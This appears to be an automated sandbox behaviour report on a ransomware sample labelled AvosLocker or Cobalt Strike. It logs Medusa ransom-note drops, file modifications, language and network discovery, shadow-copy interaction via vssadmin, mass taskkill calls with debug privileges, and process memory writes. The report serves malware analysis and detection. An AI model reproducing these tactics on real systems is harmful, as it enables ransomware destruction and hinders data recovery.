File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\ja-JP\currency.html C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\it-IT\js\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\DVD Maker\es-ES\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\glass_lrg.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\js\highDpiImageSwap.js C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-back-over-select.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-previous-over-select.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BABY_01.MID C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00532_.WMF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD10358_.GIF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\graph_down.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\ja-JP\sbdrop.dll.mui C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198020.WMF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02444_.WMF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\vssadmin.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2180 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2672 wrote to memory of 2844 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2672 wrote to memory of 2844 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2672 wrote to memory of 2844 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2672 wrote to memory of 2844 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2180 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2700 wrote to memory of 2760 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2700 wrote to memory of 2760 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2700 wrote to memory of 2760 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2700 wrote to memory of 2760 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2180 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2912 wrote to memory of 888 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2912 wrote to memory of 888 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2912 wrote to memory of 888 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2912 wrote to memory of 888 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2180 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2704 wrote to memory of 2588 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2704 wrote to memory of 2588 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2704 wrote to memory of 2588 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2704 wrote to memory of 2588 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2180 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2596 wrote to memory of 2544 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2596 wrote to memory of 2544 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2596 wrote to memory of 2544 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2596 wrote to memory of 2544 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2180 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2552 wrote to memory of 2604 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2552 wrote to memory of 2604 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2552 wrote to memory of 2604 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2552 wrote to memory of 2604 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2180 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2616 wrote to memory of 1708 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2616 wrote to memory of 1708 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2616 wrote to memory of 1708 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2616 wrote to memory of 1708 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2180 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 2180 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe C:\Windows\SysWOW64\net.exe
PID 3060 wrote to memory of 2316 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3060 wrote to memory of 2316 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3060 wrote to memory of 2316 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3060 wrote to memory of 2316 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

